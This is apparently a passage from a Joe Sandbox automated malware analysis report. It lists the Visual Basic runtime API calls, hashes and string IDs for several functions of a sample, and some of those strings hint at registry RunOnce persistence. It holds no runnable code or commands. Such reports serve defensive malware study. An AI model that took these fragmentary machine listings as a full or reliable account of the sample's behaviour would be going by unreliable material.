                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00411589
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 936154001-0
                                                                                                                                                                                  • Opcode ID: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
                                                                                                                                                                                  • Instruction ID: ff6c34d3fed2378173252cfce728cf62963b49a80d3fcd64e048a008bc34630c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
                                                                                                                                                                                  • Instruction Fuzzy Hash: F6B12D71D00218AFDB04DFE4DE88AEE7BB9FB88311F10452AE616E72A0DB745945CF58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040480F Relevance: 89.6, APIs: 47, Strings: 4, Instructions: 334COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040BF4E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040BF95
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( RO,00000000,80000002,00000000,Start,00000004,80000002,00000000,Start,00000002,80000001,00000000,00000000,00000000), ref: 0040C00B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C016
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,00000000,004025E6), ref: 0040C030
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C03B
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,004025E6), ref: 0040C056
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( RO,00000000,?,00000000,004025E6), ref: 0040C072
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C07D
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,004025E6), ref: 0040C096
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C0A1
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,004025E6), ref: 0040C0BC
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040C0D3
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C0DE
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C111
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040C12C
                                                                                                                                                                                  • __vbaNew.MSVBVM60(0040564C), ref: 0040C13E
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C149
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C17C
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040C197
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040C1C2
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000000,00000001), ref: 0040C1D6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040C1EB
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000001,00000000), ref: 0040C1F4
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C214
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040C238
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040C252
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040C259
                                                                                                                                                                                  • #529.MSVBVM60(00000008), ref: 0040C26D
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C27D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Error$CopyMove$System$AnsiListUnicode$Chkstk$CheckHresult$#529BstrCast
                                                                                                                                                                                  • String ID: RO$C$Once$Start
                                                                                                                                                                                  • API String ID: 3306888832-2962527757
                                                                                                                                                                                  • Opcode ID: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
                                                                                                                                                                                  • Instruction ID: 2a7bed8e637f556c1a294a0d9af7fafa12270aafcab1a65859bb43c9b5deaf43
                                                                                                                                                                                  • Opcode Fuzzy Hash: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24D1DC75900208EFDB04DFE4DD89BDE7BB9FB48305F108529F606B61A0DB745A45CBA8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040AE40 Relevance: 80.8, APIs: 43, Strings: 3, Instructions: 347COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040AE5E
                                                                                                                                                                                  • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,?,004025E6), ref: 0040AEA7
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AEB6
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AECE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AEF4
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040AF1D
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,004025E6), ref: 0040AF5A
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 0040AF94
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040AFAA
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 0040AFC3
                                                                                                                                                                                  • #525.MSVBVM60(00000104), ref: 0040AFEC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040AFF7
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040B02E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040B06D
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040B088
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040B0AE
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0040B0BF
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0040B0D4
                                                                                                                                                                                  • #616.MSVBVM60(?,?), ref: 0040B0E9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040B0F7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 0040B111
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 0040B118
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040B123
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B139
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?,?,?,004025E6), ref: 0040B14D
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000,?,?,?,004025E6), ref: 0040B17F
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000,?,?,?,004025E6), ref: 0040B1BD
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B204
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,004025E6), ref: 0040B21A
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B233
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 0040B257
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 0040B2DB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040B2F3
                                                                                                                                                                                  • #600.MSVBVM60(00000008,00000000), ref: 0040B312
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 0040B324
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 0040B399
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040B3B2
                                                                                                                                                                                  • #600.MSVBVM60(00000008,00000000), ref: 0040B3D1
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 0040B3E3
                                                                                                                                                                                    • Part of subcall function 00410560: __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                                                    • Part of subcall function 00410560: __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                                                    • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                                                    • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                                                    • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                                                  • #598.MSVBVM60 ref: 0040B3F0
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040B456), ref: 0040B42E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$System$Free$Ansi$Move$ChkstkUnicode$#580#600Copy$#517#525#598#616BoundsBstrConstruct2GenerateList
                                                                                                                                                                                  • String ID: PR$ SE$4
                                                                                                                                                                                  • API String ID: 3576955720-2816282373
                                                                                                                                                                                  • Opcode ID: 1de2eecb3e22f9f67d275207b9972fb08be8cc8f6e3fb6eea473884b16e18e1a
                                                                                                                                                                                  • Instruction ID: 549e129ae2bb91e84472ac49bce2616dd184e0a5e73778e746ab4582d66d714c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1de2eecb3e22f9f67d275207b9972fb08be8cc8f6e3fb6eea473884b16e18e1a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F1FAB5901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00419150 Relevance: 73.9, APIs: 49, Instructions: 362COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(660E19DC,00000000,00000FEE), ref: 004191A8
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004191B0
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 004191B4
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 004191CC
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 004191DB
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?), ref: 004191F4
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(004053B8), ref: 004191FF
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 00419206
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00419217
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041922B
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00419235
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00419245
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00419256
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000), ref: 00419259
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419277
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 0041928D
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004192A6
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(004053B8), ref: 004192AD
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000004,0041B1A0,00000000), ref: 004192F5
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 004192FE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041930B
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,0041B1A4,00000000), ref: 0041931C
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000004,0041B110,00000000), ref: 0041932C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00419341
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00419359
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00419368
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?), ref: 00419379
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00419384
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,00000000), ref: 00419396
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0041939F
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004193C1
                                                                                                                                                                                  • __vbaUI1I2.MSVBVM60 ref: 004193CC
                                                                                                                                                                                  • __vbaUI1I2.MSVBVM60 ref: 004193F8
                                                                                                                                                                                  • __vbaUI1I2.MSVBVM60 ref: 00419402
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00419694
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004196D0
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004196D5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$Get3$Copy$#516#631BstrFile$#525#648ErrorOpen$#537BoundsCloseExitGenerateListProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3049632819-0
                                                                                                                                                                                  • Opcode ID: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                                                  • Instruction ID: 619ad798aab7bc499b7524e0dff90ded30000a5dd3d7a33beffa270327a53f47
                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 44D1C472900249EFDB14EFA4DD64ADDBBB6FB48300F10812AE555A72A0DB385CC1CF68
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00415D30 Relevance: 64.8, APIs: 43, Instructions: 350COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(660E1A08,00000000,660E6C4A), ref: 00415DA5
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00415DAD
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 00415DB1
